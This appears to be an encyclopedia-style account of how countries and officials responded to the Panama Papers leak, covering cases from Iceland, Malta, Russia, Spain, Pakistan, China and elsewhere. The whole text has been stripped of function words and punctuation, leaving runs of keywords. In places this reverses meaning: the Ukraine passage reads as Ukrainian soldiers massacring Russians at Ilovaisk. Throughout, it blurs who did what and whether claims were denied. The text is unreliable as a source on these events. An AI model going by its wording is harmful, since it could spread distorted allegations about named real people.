regard press reports citing leaked documents known panama papers central bank cyprus announces assessing information extent may concern cypriot banking system taking necessary appropriate action cypriot online paper said cyprus link stems fact fonseca runs office cyprus specifically limassol chart leaks name cyprus tax countries offer little tax although corporate tax rate 12.5 ireland september 2016 danish tax authorities purchased panama papers data 320 companies 500-600 individuals investigate although data came anonymous source vetted credible sample data french financial prosecutors opened probe former president françois hollande declared tax evaders would brought trial punished also result leak france restored panama list tax havens panama recently removed former french budget minister jérôme cahuzac spearheaded crackdown tax fraud office client mossack fonseca owned seychelles company named cerman group limited incorporated 2009 france investigated 2013 allegations mediapart 2000 cahuzac held undeclared assets account first switzerland singapore resigned cabinet post protesting innocence admitted months later indeed hidden €600,000 ubs account moved keep hidden continuing lead france clampdown tax evasion french socialist party unanimously voted expel week later heels april 2013 cahuzac affair president hollande created parquet national financier pnf judiciary investigation unit specializing large-scale fraud corruption investigations jean-marie le pen founder long-time leader far-right-wing front national fn member european parliament already subject along daughter marine le pen staff pnf tax fraud investigation drawing official scrutiny undeclared hsbc account containing €2.2m gold coins managed geneva aide trust based british virgin islands closed moved bahamas 2014 allegations overbilling misuse comingling campaign funds tax evasion jean-marie le pen also suspected using european parliament funds campaign administrative expenses french political party jean-marie le pen mentioned documents along daughter marine le pen current party leader frederic chatillon fn insider also close friend marine among three may hidden much million pounds offshore accounts bidzina ivanishvili became wealthy russia returning georgia becoming prime minister 2012 public official asset declaration 72 pages long however list lynden management mossack fonseca company held 20 shares raptor pharmaceuticals declare us-based company listed new york stock exchange refused nearly four years provide copy passport proof address law firm needed comply money-laundering regulations well inquiries company financial investigation agency british virgin islands forbes calculates ivanishvili net worth 4.8 billion panama papers confirmed politician stavros papastavrou advisor former prime ministers kostas karamanlis antonis samaras member council panamanian foundations green shamrock foundation diman foundation 2005 2014 2006 became deputy chairman aisios foundation still exists today however papstavrou resigned aisios foundation 2012 number greek families significant art collections implicated scandal prime minister sigmundur davíð gunnlaugsson elected 2008 banking collapse iceland pledged clean corruption banking system sigmundur davíð took seat disclose 50 interest wintris company owned bonds one bankrupt banks divest day new law took effect january 1 2010 would required declare conflict interest sold share wife owns half couple come wealthy families bought wintris working journalist anthropologist failure disclose asset apparently broke laws country remembers 2008 financial crisis well thought put past since sigmundur davíð negotiated behalf iceland creditors failed icelandic banks discovery sigmundur davíð wife bondholder caused much outrage 22,000–24,000 people attended anti-government protest outside parliament april 4 2016 almost 8 population sigmundur davíð suggested snap election members coalition government want elections resignation april 5 2016 prime minister iceland sigmundur davíð gunnlaugsson announced resignation reykjavik grapevine news site kjarninn revealed president ólafur ragnar grímsson connections lasca finance limited registered 2005 british virgin islands ólafur ragnar categorically denied personal family ties companies tax havens parents wife dorrit moussaieff operated company 1999–2005 financial statements moussaieff family business show received nearly £7 million 10.2 million us €9.1 million interest payments lasca 2000–2005 2005 moussaieff jewelers limited sold 10 stake lasca s. dorrit moussaieff deceased father mother 86 years old registered owner lasca ownership stake dorrit sisters tamara sharon inherit fortune considered among largest world bjarni benediktsson iceland finance minister chairman gunnlaugsson coalition partner comes one iceland wealthiest families confirmed owned 33 falson co. seychelles shell company founded 2005 purchase real estate dubai still active 2009 benediktsson already member parliament financial disclosure requirements said registered company tax authorities aware registered seychelles minister interior ólöf nordal husband powers attorney dooley securities s.a. offshore company located panama said company founded husband never used think disclose hrólfur ölvisson managing director gunnlaugsson progressive party says mossack fonseca companies list name inactive long time legal businesswoman ingibjörg pálmadóttir husband jón ásgeir jóhannesson several years financed business dealings panamanian company guru invest owns shares retailer sports direct rhapsody investments europe based luxembourg guru invest paid around us 16 million glitnir bank crashed cover debt gaumur one jón ásgeir companies loaned isk 100 million jón ásgeir company þú blásól offshore company owns named jovita asked journalists kjarninn money came ingibjörg reply ingibjörg primary owner 365 media group owns icelandic news outlets vísir.is television channel stöð 2 radio stations bylgjan fm 957 none seem reporting disclosure irish times newspaper handled irish component leak prominent irish names listed included golfer pádraig harrington property developer sean mulryan manager irish rock group u2 paul mcguinness lists also included stanley watson senior partner ireland largest tax-law firm matheson led creation many irish corporate tax management tools used us multinationals ireland avoid billions us taxes list also included irish fine gael political advisor frank flannery april 6 2016 italy procura turin ordered guardia di finanza investigate 800 italians contained panama papers documents former long-time prime minister silvio berlusconi already convicted tax evasion expelled parliament included papers notable people whose names mentioned papers include entrepreneurs luca cordero di montezemolo flavio briatore adriano galliani actor carlo verdone investigation icij partner namibian found imprisoned mafioso vito roberto palazzolo shielded finances italian namibian south african authorities shell companies british virgin islands set german banker hong kong wolf-peter berthold also used transfer control palazzolo assets son panama papers linked minister government prime minister joseph muscat konrad mizzi prime minister chief staff keith schembri shell companies panama furthermore mizzi wife sai mizzi liang malta trade envoy china consul general malta shanghai china also named beneficiary together children trust based new zealand holding mizzi panama shell company mizzi april 28 2016 minister health energy currently minister tourism listed panama papers owner panama shell company called hearnville inc indications maltese press mizzi links offshore trust prevent mizzi elected deputy leader party affairs ruling labour party february 25 2016 following change party statutes enable sitting mp appointed mizzi stepped deputy leader labour party april 28 2016 schembri businessman managed electoral campaign labour party 2013 maltese general elections serves chief staff muscat reported hold offshore company based british virgin islands owns anonymous shell company panama called tillgate inc held trust established new zealand konrad mizzi keith schembri acquired shell companies panama hearnville inc tillgate inc respectively via mossack fonseca representatives malta also tried open bank accounts linked two shell companies two politically exposed persons various jurisdictions owner third anonymous shell company panama egrant inc whose existence revealed document referring two companies remains unknown although strict secrecy observed acquisition including avoidance e-mail communications utilization communications via skype fuelled strong suspicions third top maltese politically exposed person involved 2015 declaration assets dated february 8 submitted maltese parliament end march 2016 muscat said 'd shown draft form panama papers leaked mizzi listed trust new zealand shell company panama april 28 2016 report matter commissioned government malta unnamed international audit firm still pending april 28 2016 muscat announced cabinet reshuffle mizzi lost ministerial portfolio health energy retained minister without portfolio office prime minister malta member european union minister implicated scandal date withstanding mizzi schembri involvement scandal still hold high positions maltese government mark a. sammut wrote book case called l-aqwa fl-ewropa il-panama papers u l-poter best europe panama papers power october 2017 daphne caruana galizia blogger led panama papers investigation corruption malta killed car bomb near home norwegian tax administration expects demand access information dnb norway largest financial services group approximately 30 companies formed dnb owned norwegians 20 living norway 200 norwegians client list mossack fonseca icij offshore leaks database shows portugal 246 offshore entities 300 officers 40 intermediaries 175 addresses linked activities described mossack-fonseca papers newspapers reporting involvement several politicians government officials bankers company managers may 2017 criminal judicial consequences involved süddeutsche zeitung one newspapers participating project made papers public described connections various individuals listed russian president vladimir putin quoted nobel-winning economist paul krugman us state department documents saying russia kleptocracy mafia state respectively süddeutsche zeitung reported 2 billion moved network companies associated russian firms individuals years companies appeared used questionable business transactions putin criticized offshore companies unpatriotic several occasions since 2011 2013 law passed banning foreign bank accounts government officials putin name appear records released date associates construction billionaires arkady boris rotenberg musician sergei roldugin business magnate alisher usmanov mentioned leaked documents putin long-standing friend billionaire gennady timchenko well press secretary spouse cousin former kgb colleagues well several oligarchs connected mossack fonseca shell companies sergei roldugin cellist st petersburg orchestra godfather putin eldest daughter described putin best friend appears prominently panama papers according leaked papers roldugin acquired assets worth least 100 million including 12.5 stake video international russia largest television advertising firm companies stock options russia biggest companies rights loans worth hundreds millions dollars 2008 company controlled roldugin joined several offshore companies help another putin insider acquire control kamaz russia largest truck manufacturer obtain investment german carmaker daimler ag 250 million 10 kamaz sandalwood another company roldugin insiders interest issued lines credit 2009 2012 worth 800,000 russian commercial bank rcb cyprus wholly owned subsidiary vtb bank largely owned russian state panama papers documents indicate roldugin companies received several loans collateral low interest rates never repaid 2013 several shell companies linked brothers boris arkady rotenberg loaned worth us 200 million company roldugin network leaked documents show whether repaid shortly loan granted arkady rotenberg company awarded tender south stream pipeline project worth billions asked companies rodulgin said take look find say ca n't financial matters delicate putin spokesperson dmitry peskov called western reporting panama papers putinophobia said target putin part conspiracy russia orchestrated central intelligence agency united states department state others putin denied element corruption said opponents trying destabilize russia putin also said wikileaks showed us official people official organs us behind 2016 annual direct line vladimir putin called leaked documents reliable confined comments roldugin saying western media understand musician spent off-shore income musical instruments russia putin also said goldman sachs owned shares parent company süddeutsche zeitung fact owned munich family german media group kremlin apologized mistake initially mainstream russian media almost entirely ignored leak neither state-owned channel 1 rossiya 1 privately owned ren-tv ntv mentioned story april 4 day story broke minimal coverage story ran middle night vesti tv relation lionel messi michel platini exception russian opposition newspaper novaya gazeta described icij russian partner reported story hard copy online end april occrp published analysis batch leaked documents demonstrating cash flow rodulgin accounts 2007 tax theft 230m moscow tax inspectors uncovered reported sergei magnitsky april 15 2016 josé manuel soria forced leave post acting minister industry energy tourism panama papers revealed family maintained several offshore societies tax havens previous decades soria initially denied reports kept leaking contradicted april 14 company came light owned jersey 2002 mayor las palmas soria put critical political position result confusing changing explanations issue resigned next day prominent spanish politician offshore companies former imf president rodrigo rato vice-president conservative government prime minister josé maría aznar €3.6 million two offshore companies charged spain alleged tax offenses money laundering corruption among individuals cases corruption micaela domecq-solís wife miguel arias cañete currently european commissioner climate action energy formerly eu minister agriculture food environment also opened shell societies spanish royal family also involved tax scandal princess pilar borbón duchess badajoz sister former king juan carlos aunt current king felipe vi offshore corporation 40 years abdication brother assembled company called delantera financiera 1974 president administrator initially denied name appeared panama papers husband died 1991 secretary-general corporation son bruno gomez-acebes treasurer manager company name count ripalda brother jaime de marichalar former husband king daughter elena de borbón also appears moreover huge corruption scandal involving royal house iñaki urdangarin business associate nóos foundation advised mossack fonseca move funds two great-grandchildren dictator francisco franco francisco juan josé franco suelves set registered societies british virgin islands mossack fonseca juan josé franco opened malini investments 1997 director 2012 closed 2013 told newspaper el confidencial absolutely ignorant francisco franco suelves older brother also opened vamfield alliance limited 1997 director son jordi pujol former president generalitat catalonia considered linchpin catalan independence granted diversion commission 6.8 million euros sale office opaque society repaid another offshore company 5 million pujol family parents children charged several counts tax fraud corruption among crimes current wife former prime minister spain felipe gonzález maría garcía vaquero opened account switzerland carmingo ltd 2004 tax niue island south pacific lawyer cándido conde-pumpido jr. son former general prosecutor spain magistrate supreme court spain cándido conde-pumpido asked open mossack fonseca offshore company 2008 though transaction n't completed intended offshore company intermediary project build skyscraper capital panama hide money francisco paesa important spy cni working ministry interior opened offshore account faking death 1998 top bankers spanish businessmen used firm open accounts companies miguel blesa president caja madrid tried spanish courts numerous cases corruption jesus barderas businessman close ex-prime minister felipe gonzález children lawyer javier de la rosa also linked corruption cases carlos ortega ceo pepe jeans families major hotel chains riu riu hotels resorts escarrer meliá hotels international martinón group martinón art collectors marina ruiz-picasso borja thyssen mossack fonseca companies thyssen lawyer said company fully declared tax authorities ruiz-picasso declined comment celebrities involved include spanish director pedro almodóvar oscar 2003 habla con ella brother agustin created company 1991 called glen valley british virgin islands agustin responded saying closed company 1994 paid taxes showbiz personality carmen lomana said death husband owner offshore company took care without knowing anything business tax bertín osborne host spanish singer famous actor imanol arias protagonist one longest important series spanish television cuéntame cómo pasó named osborne said account legal used recommended save money also involved scandal fraud treasury actress fellow protagonist series ana duato juan luis cebrián journalist co-founder el país ceo prisa spanish media conglomerate owns 2 star petroleum related oil corporation tax havens named decided take legal action la sexta revealed involvement scandal former president fc barcelona josep lluís núñez current vicepresident carles vilarrubí eduardo fernando de blas vicepresident real madrid offshore companies mossack fonseca swedish financial supervisory authority fi said april 4 2016 would investigate actions nordea one largest financial institutions nordic countries panama papers revealed bank luxembourg office helped set nearly 400 offshore companies clients 2004 2014 panama british virgin islands customers swedish financial supervisory authority fi said serious deficiencies exist nordea monitors money laundering given bank two warnings 2015 nordea pay largest possible fine—over five million eur 2012 nordea asked mossack fonseca change documents retroactively three danish customers power attorney documents would appear force since 2010 director nordea private banking thorben sanders admitted 2009 nordea screen tax evaders end 2009 decided bank shall means tax evasion said sanders swedish banks also present documents nordea occurs 10,902 times next frequently mentioned bank occurs 764 times swedish financial supervisory authority fi later said would also investigate three big banks sweden handelsbanken skandinaviska enskilda banken seb swedbank nordea cut ties mossack fonseca following interview nordea ceo casper von koskull svt april 4 response leaks prime minister stefan löfven said critical nordea conduct role minister finance magdalena andersson characterized bank conduct totally unacceptable april 6 federal police searched uefa headquarters nyon part criminal mismanagement probe champions league television rights deal signed fifa new president gianni infantino day geneva attorney general opened several procedures reaction report misconduct swiss lawyers trustees april 8 hours publication new series articles focusing art hidden behind offshore companies prosecutor sequestered modigliani worth 25 million geneva freeport litigation new york alleged painting stolen nazis world war ii defendants said leaked documents show control international art center shell company registered panama yves bouvier russian billionaire dmitry rybolovlev litigation art pricing mossack fonseca companies leaked papers also shed light ownership shell companies protracted litigation lausanne ownership artwork gstaad chalet late greek shipping tycoon basil goulandris april 11 another investigation abuse name charities like red cross wwf launched swiss-based diacore mossack fonseca client approximately thirty companies diacore run daniel steinmetz recently brother beny steinmetz power attorney company diacore part steinmetz group ukrainian president petro poroshenko took office 2014 popular uprising toppled predecessor viktor yanukovych poroshenko pledged sell candy business roshen elected leaked documents indicate august 21 2014 instead mossack fonseca set offshore holding company prime asset partners ltd british virgin islands moved company roughly two months election move potential save millions dollars ukrainian taxes records cyprus show firm shareholder legal experts say explanation may sound however n't making difference ukrainian media making point poroshenko opened offshore account august 2014 ukrainian soldiers massacred russians ilovaisk panama papers report may also figured defeat trade deal netherlands referendum april 6 anti-corruption group transparency international believes creation businesses serving president direct violation constitution also journalists organized crime corruption reporting project believe move poroshenko committed two illegalities starting new business office failing afterwards report disclosure statements poroshenko denied wrongdoing spokesman said offshore company active assets legitimate corporate restructure aimed helping sell poroshenko roshen group analysts ukraine responded secretive way poroshenko set accounts certain undermine trust party ukraine news poroshenko offshore business came government campaigned offshore companies oleh lyashko leader radical party urged lawmakers begin impeachment proceedings even allies backed calls parliamentary commission investigate allegations ukrainian parliament relations poroshenko bloc people front party prime minister arseniy yatsenyuk previous months already soured mutual accusations corruption prime minister arseniy yatsenyuk also announced would resign panama papers leaks according guardian £170bn uk property held overseas ... nearly one 10 31,000 tax companies british property linked mossack fonseca included among panama paper documents names six members house lords several donors cameron conservative party well conservative donors include united kingdom still exercises varying degrees control british overseas territories crown dependencies make large number many tax havens secrecy jurisdictions exist pressure mounted prime minister david cameron make changes according wall street journal panama papers shining light constellation offshore centers last remnants british empire gibraltar british virgin islands bvi companies created mossack fonseca included leaked data bvi companies topped list 113,000 nearly 215,000 companies mossack fonseca managed incorporated british overseas territory anguilla 7th list cameron criticized complex offshore structures 2013 saying fair right companies saying 've got lots sales uk 'm going pay sort royalty fee another company another country special tax dispensation said would bring issue g8 summit year summit cameron demanded transparency arguing would better business 2014 cameron asked overseas territories crown dependencies set open register firms individuals investments registered jurisdictions time panama papers leak april 2016 montserrat gibraltar agreed leader opposition jeremy corbyn said government needs stop pussyfooting around tax dodging called direct rule imposed british overseas territories crown dependencies act tax havens former business secretary vince cable agreed although former attorney general dominic grieve described proposal bit nuclear option would destroy livelihoods bvi inhabitants finance industry labour party also said cameron planned anti-corruption summit may would charade cameron chairman summit require representatives crown dependencies overseas territories attend jennie granger spokeswoman hmrc said department received great deal information offshore companies including panama wide range sources currently subject intensive investigation said hmrc asked icij share data private eye revealed edward troup appointed executive chair hmrc april 2016 former partner simmons simmons london-based legal firm whose clients included panama-registered fund created david cameron father blairmore holdings papers obtained süddeutsche zeitung icij reveal simmons simmons close relationship running offshore companies major overseas property owners including investment company run behalf sheikh hamad bin abdullah al thani troup senior tax partner ian cameron late father uk prime minister david cameron ran offshore fund blairmore holdings inc. mossack fonseca avoided uk taxes 30 years company moved ireland david cameron became prime minister april 6 cameron admitted owned shares blairmore said sold shares becoming pm prominent politicians criticized involvement cameron family scandal leader opposition jeremy corbyn urged immediate independent investigation tax affairs cameron family well tighter laws uk tax avoidance opponents also called cameron resignation admitted owning shares blairmore azerbaijan international mineral resources operating company ltd aimroc consortium partners spent nearly us 230 million open mine build refinery western azerbaijani village chovdar aimroc possibly produced us 30 million gold suddenly disappearing without making payroll may 2014 mine employees officially remain vacation azerbaijani law full-time employees seek work elsewhere even though paid two years 2012 investigation radio free europe organized crime corruption reporting project occrp discovered overseas holding companies daughters azerbaijani president ilham aliyev owned interest gold mine operation created 2006 presidential decree forming consortium awarding 30-year lease environmental transparency objections parliament panama papers made possible trace elaborate network shell companies manage ownership mines 2016 occrp able establish fact daughters control mining operation aliyev awarded gold mines globex international llp londex resources s.a. willy meyris s.a. fargate mining corporation thirty percent proceeds allocated government azerbaijan 11 remaining 70 went globex 45 londex 29 willy meyris remaining 15 fargate companies registered panama according documents obtained panama registry companies one fargate mining corporation founded tagiva management ltd. tagiva services ltd. verda management ltd issued general power attorney granted favour azerbaijan-born individual mr. nasib hasanov later londex resources s.a. globex international llp fargate mining corporation willy meyris s.a. registered st. kitts nevis addresses already used registering offshore energy holding – nobel oil ltd. partner state oil company socar azerbaijan umid gas field founder nobel oil group also mr. n. hasanov 2012 investigation reporters established globex owned shell companies panama shell companies belonged president daughters swiss businessman whose name appears shell companies manage azerphone family telecommunications monopoly villagers told reporters hoped work mine paid 12 day asked intervene president problems mine causing water supply became angry believe reporters said president family stake mine following may publication report national assembly passed law making illegal report company ownership another giving former presidents first ladies lifelong legal immunity khadija ismayilova radio free europe reporter 2012 investigation subjected escalating legal public harassment threatened eventually arrested currently serving 7.5 year sentence tax evasion abuse power leaked mossack fonseca documents made possible establish daughters also owned londex majority partner gold enterprise entirely clear shut operation industry experts familiar consortium say seem experienced may rushed production according icij aliyev daughter arzu financial stakes gold rights also azerfon country largest mobile phone business shares sw holding controls nearly every operation related azerbaijan airlines azal meals airport taxis sisters brother heydar property dubai valued roughly 75 million 2010 heydar legal owner nine luxury mansions dubai purchased 44 million leaked documents show daughters leyla arzu aliyeva hold shares exaltation limited incorporated april 2015 holding uk property child child london law firm registered obtained nominee directors though jersey branch mossack claimed women political connections family azerbaijan president ilham aliyev leads well-off life thanks part financial interests various sectors nation economy wife ascendants privileged powerful family owns banks insurance construction companies television station line cosmetics well known pre-eminent charity work led construction schools hospitals country major sports complex april 7 2016 anti corruption commission bangladesh launched inquiry obtain details businesses individuals allegedly affiliated mossack fonseca allegations made thirty-two bangladeshi individuals two corporations however media outlets staking claim referenced old icij database information compiled investigation 2013 offshore leaks relatives highly placed chinese officials including seven current former senior leaders politburo communist party china named including former premier li peng daughter li xiaolin former communist party general secretary hu yaobang son hu dehua deng jiagui brother-in-law current general secretary xi jinping deng two shell companies british virgin islands xi member politburo standing committee dormant time xi became general secretary communist party paramount leader november 2012 others named include son daughter-in-law propaganda chief liu yunshan son-in-law vice-premier zhang gaoli official chinese statistics show investment british overseas territories acting tax havens much significant places 44 billion invested cayman islands 49 billion british virgin islands despite figures probably exclud ing private investments many family members ruling elite channelled money bvi figures exceed chinese investment united states united kingdom china government suppressing mention panama papers social media search engines results reportedly told news organizations delete content related panama papers leak chinese authorities consider material concerted foreign media attack china ordered internet information offices delete reports reprinted panama papers exceptions follow related content hong lei spokesman china foreign ministry responded comment groundless accusations april 5 news conference screenshot showed authorities forced websites delete content panama papers foreign websites wikileaks china digital times blocked mainland china sina weibo twitter-like social media website censors deleted content panama paper however name xi brother-in-law got weibo users tried circumvent less obvious language brother-in-law canal papers panama canal despite censorship weibo search ranking topped phrases seemingly related panama papers tax evasion document leak putin chinese entertainment magnate art collector wang zhongjun also appears documents respond request comment according tax justice network chinese investors sometimes use overseas companies take advantage incentives china offers foreign investors canadian broadcaster radio canada reported hong kong-based citic pacific mossack fonseca set manage 90 subsidiaries chinese government majority stakeholder according fiscal expert marwah rizqy professor tax law université de sherbrooke mossack fonseca hong kong office busiest says icij chinese officials wealthy figures would carry funds across border deposit channeled offshore entities hong kong invested hk 4.6 trillion £360 billion bvi – hong kong invested mainland china – received hk 4.1 trillion £300 billion bvi £20 billion placed cayman islands bermuda individually newspaper ming pao fired deputy editor keung kwok-yuen following front-page article panama papers mentioned many prominent hong kong citizens paper blamed difficult business environment previously fired another editor 2014 another leak offshore documents employees publishing blank columns scattered newspaper protest dismissal polytechnic university two offshore companies set mossack fonseca 2012 2013 one created vice-president nicholas yang wei-hsiung became minister hong kong bollywood celebrities amitabh bachchan daughter-in-law actress aishwarya rai bachchan actor ajay devgan listed papers bachchan denied connection overseas companies spokesman rai also questioned documents authenticity bachchan repeated denial response august 21 report listed director two companies participated board meetings also listed real estate developer dlf ceo kushal pal singh sameer gehlaut indiabulls group gautam adani elder brother vinod adani shares companies fell following release papers well apollo tyres also mentioned dlf said invested existing overseas companies compliance lrs scheme set 2004 reported indian tax agency apollo spokesman said family members chairman onkar kanwar reported owning offshore companies live india complied law resided gehlaut said paid full taxes made full disclosures indian politicians list include shishir bajoria west bengal anurag kejriwal former chief delhi lok satta party bajoria said owned two isle man companies one ascribed leaked documents corporate services provider first names group acknowledged erroneously providing information mossack fonseca mf records show kejriwal director three offshore companies based british virgin islands bvi holding two private foundations panama power attorney another bvi company acknowledged offshore companies said shut short period time name deceased drug kingpin iqbal mirchi also surfaced papers 500 indian citizens appear mentioned indian government ordered inquiry subsequently announced constituting special multi-agency group comprising officers investigative unit central board direct taxes foreign tax tax research division financial intelligence unit reserve bank india 600 israeli companies 850 israeli shareholders listed among israeli names found leaked documents top attorney dov weissglass bureau chief deceased prime minister ariel sharon jacob engel businessman active african mining industry idan ofer member one israel wealthiest families according haaretz weissglass name appears sole owner one four companies set business partner assaf halkin company talaville global registered british virgin islands may 2012 according haaretz seven months later shares mortgaged loan vienna bank weissglass halkin told haaretz company registered purpose receiving loan bank order invest european properties bank would allow loan corporation ... company activity reported tax authorities israel required tax said activity paid israel many leaked documents reference bank leumi primarily branch island tax jersey one customers billionaire teddy sagi made fortune developing online gambling technology england recently developed camden market commercial real estate space sagi sole shareholder least 16 mossack fonseca offshore companies mostly real estate ventures israeli businessman beny steinmetz also mossack fonseca customer 282 companies nawaz sharif second top official ruled result information disclosures panama papers supreme court disqualified office one judge said mr sharif longer eligible honest member parliament pakistan ruling party pakistan muslim league-nawaz pml-n permitted speaker national assembly select interim prime minister 2018 general election supreme court verdict announced context heightened security capital 3,000 armed police members pakistan rangers paramilitary force deployed around supreme court verdict followed months dramatic news coverage social media debates divisions falling largely along party lines hearing october 18 2017 resulted indictment sharif faced allegations corruption since 1980s panama papers corroborated federal inquiry mid-1990s name nawaz sharif younger brother punjab chief minister shebaz sharif also link in-laws shebaz sharif children nawaz sharif offshore companies mossack fonseca records tie nawaz daughter maryam nawaz brothers hussein hassan four offshore companies nescoll limited nielson holdings limited coomber group inc. hangon property holdings limited companies acquired luxury real estate london 2006–2007 real estate collateral loans 13.8 million according panama papers prime minister children say money came sale family business saudi arabia offshore companies assets disclosed family wealth statement suspicion companies meant hide launder ill-gotten wealth avoid taxes called sharif ethics question prior ruling maryam nawaz tweeted denial wrongdoing adding company/property abroad except trustee brother corporation entitles distribute assets brother hussain family/children needed leaked documents name trustee nescoll created 1993 nielson first registered 1994 two companies subscribed mossack fonseca services july 2006 mossack fonseca managing nescoll nielsen holdings coomber group three companies obtained £7 million mortgage swiss bank deutsche bank suisse sa purchased four flats avenfield house 118 park lane london hassan brother bought hangon holdings stock 2007 £5.5 million hangon bought property financed bank scotland 1 hyde park place london samina durrani mother shebaz sharif second wife ilyas mehraj brother first also figure documents habib waqas group/ilyas mehraj listed shareholder 127,735 shares haylandale limited registered july 24 2003 bahamas mehraj denied knowing anything company whether incorporated commonwealth bahamas anywhere else name haylandale ltd. rainbow limited newest three offshore companies owned samina durrani registered september 29 2010 british virgin islands bvi armani river limited registered bahamas may 16 2002 describes assets property london currently rented assets star precision limited registered bvi may 21 1997 reported cash investment portfolio also holding 1,165,238 shares orix leasing pakistan limited hussain nawaz said family wo n't hamper investigation urged one former president pervez musharraf well government april 15 announced investigation inquiry commission pakistanis named documents opposition politicians said judge retired judge investigate numerous judges recused july 28 2017 supreme court pakistan disqualified sharif holding office late benazir bhutto also mossack fonseca client 2001 firm set bvi company petroline international inc. bhutto nephew hassan ali jaffery bhutto aide head security rehman malik later became senator interior minister government yousaf raza gillani mossack fonseca deemed bhutto first company similarly named petrofine fzc politically sensitive declined accept mrs bhutto client united nations committee chaired former us federal reserve head paul volcker determined 2005 investigation abuses oil-for-food program petrofine fzc paid us 2 million iraqi government saddam hussein obtain us 115–145 million oil contracts 2006 pakistani national accountability bureau nab accused bhutto malik ali jaffery owning petrofine established since 2000 sharjah united arab emirates bhutto pakistan peoples party denied april 2006 nab court froze assets owned pakistan elsewhere bhutto husband asif ali zardari saying assets totaling 1.5 billion result corrupt practices swiss charges criminal money laundering filed 1997 still litigation tareq abbas son mahmoud abbas president palestinian authority revealed hold 1 million shares arab palestinian investment company apic offshore company associated palestinian authority partially owned authority palestine investment fund hamad bin jassim bin jaber al thani prime minister 2007 2013 2002 acquired three shell companies incorporated bahamas another british virgin islands moorage mallorca 300 million yacht named al mirqab panama papers indicate owns owned eight shell companies subsequent reporting forbes found al thani bought 700 million deutsche bank shares 2014 paramount services holdings 2015 transferred roughly half stock supreme universal holdings owned relative left office emir qatar also 2013 king salman mentioned leaks relation two companies based british virgin islands—verse development corporation incorporated 1999 inrow corporation incorporated 2002 companies took mortgages totaling us 34 million purchased properties central london role companies specified bvi company crassus limited incorporated 2004 registered yacht london named erga king salman palace riyadh vessel boasts banquet hall comfortably sleep 30 king salman described documents principal user former crown prince muhammad bin nayef also named papers irish times found link iran-contra panama papers persons one america colourful political donors farhad azima multi-billionaire adnan khashoggi employed mossack fonseca services important figures iran-contra scandal mossack fonseca files show khashoggi appeared early 1978 became president panamanian company isis overseas s.a documents reveal fonseca clients included sheikh kamal adham saudi arabia first intelligence chief 1963–79 brother-in-law king faisal named us senate committee cia “ principal liaison entire middle east mid-1960s 1979 ” adham controlled offshore companies involved b.c.c.i banking scandal ministry finance monetary authority singapore said statement singapore takes serious view tax evasion tolerate business financial centre used facilitate tax related crimes evidence wrongdoing individual entity singapore hesitate take firm action sri lankan finance minister ravi karunanayake said panel investigate sri lankan names come panama papers well 46 appear 2013 offshore leaks according daily mail since earlier leadership apparently country many large outstanding foreign loans taken administration former president mahinda rajapakse current government recently obtain us 1.5 billion imf bailout rajapakse denied diverting funds current government came power january 2016 anti-corruption platform rami makhlouf maternal cousin bashar al-assad worth estimated 5 billion syrian civil war control 60 economy subject sanctions united states european union controlled syria oil telecommunications business us treasury charged pangates company registered supplied assad government thousand tonnes aviation fuel however makhloufs able continue operate via panama shell companies registered british virgin islands subject us law – however may 9 2011 eu issued sanctions extended order council british virgin islands july 2011 mossack fonseca decided september 6 resign makhlouf companies makhlouf already cut ties bank hsbc told law firm swiss authorities frozen makhlouf accounts contact beneficial owner company since last 3 months bangkok post reported anti-money laundering office amlo seeking information foreign counterparts regarding twenty-one thai nationals reportedly included list people worldwide using panama-based law firm apparently specializing money laundering tax evasion clear amlo investigating twenty-one panama papers include least 780 names individuals based thailand another 50 companies based thailand foreigners foreign-owned companies 634 individual addresses thailand appear documents surfaced date including ceos giant companies bangkok land phatra finance investigations icij sole east asian partner commonwealth magazine taiwan found least 2,725 offshore companies registered addresses taiwan ninety taiwanese including singer actor nicky wu included papers according report released commonwealth magazine wu used firm horizon sky technology ltd. co-operate hong kong-based sun entertainment culture limited publisher concludes taiwanese companies individuals believed extensively using offshore shelters avoid evade taxes ... scouring panama papers documents mossack fonseca one main conduits time appears big taiwanese banks law firms accounting firms often use services mossack fonseca presence taiwan forty-six taiwanese brokers work mossack fonseca relatively small-scale consulting firms operating greater china taiwanese entities set shell companies panamanian law firm small unlisted companies individuals icij guardian independent reported uae president khalifa bin zayed al nahyan owns london real estate worth £1.2 billion structure thirty shell companies mossack fonseca set british virgin islands administer using manage control luxury properties london december 2015 mossack fonseca held nearly shares companies trust structures behalf president wife son daughter trust beneficiaries canadian prime minister justin trudeau denied involvement affair saying entirely completely transparent mine family finances something learned early canadians expect leaders canada revenue agency said statement current tax evasion audits include canadian clients associated law firm mossack fonseca added would communicate treaty partners obtain information may currently possession cra tax treaties 92 different countries 22 tax information exchange agreements cra begun completed 116 audits 234 planned investigations expected recoup least 11 million taxes fines fewer 10 related criminal investigations progress royal bank canada rbc denied wrongdoing associated 370+ clients referred mossack fonseca years extensive due diligence process ... rbc works within legal regulatory framework every country operate said bank spokesman ceo david mckay said bank review four decades documentation problems ceo bill downe bank montreal said canadian banks 'dramatically beefed anti-money laundering control last seven 10 years added link canadian businesses panama papers companies would originated long time ago canadian banks took action stop money laundering individuals surface leaked documents according icij partner investigation toronto star canadians tax fairness calculated legal tax avoidance corporations alone cost canadian treasury almost 8 billion canadian year calculated 2015 numbers found corporations individuals combined sent 40 billion declared assets tax havens ten popular alone held 270 billion canadian assets administration president luis guillermo solís suggested activity unveiled leaked documents suggests attempts evade taxes administration effort implement tax increases reforms met strong resistance opposition business figures leaked documents suggest mossack fonseca helped tuna export company borda azul set shell company british virgin islands order avoid costa rican taxes firm business headed hermes navarro president costa rican football federation 1999 2006 late 1990s finance ministry prosecutor office investigated borda azul export companies allegedly misusing tax credit certificates 1997 dozens companies accused using certificates fraud launder drug profits according icij investigative partners databasear seminario universidad mossack fonseca helped borda azul fabricate invoices allow report inflated costs—to reduce taxes—and inflated exports allow continue qualify tax credit certificates letter dated october 19 1998 mossack fonseca lawyer explained investigation panama city office concluded thirty costa rican law firms mentioned panama papers referring clients mossack fonseca resulting creation 360 shell companies particular gonzalo fajardo asociados founded former finance ministry official later economy minister gonzalo fajardo salas nearly two decades helped costa rican companies set 82 offshore corporations tax havens according databasear finance vice minister fernando rodríguez said costa rica push sign tax information exchange agreement panama legislators several parties trying line political consensus seek approval administration tax fraud bill form legislative commission investigate named panama papers according emilia molina cruz citizens action party opposition parties maintained country financial problems stem excess spending according finance department sums costa rica loses tax evasion equal 8 country gross domestic product deficits run 6 aristóteles núñez charge time government tax administration said people involved panama papers case still make tax declarations pay taxes investments mexican foreign investments bank accounts crime income declaring illegal 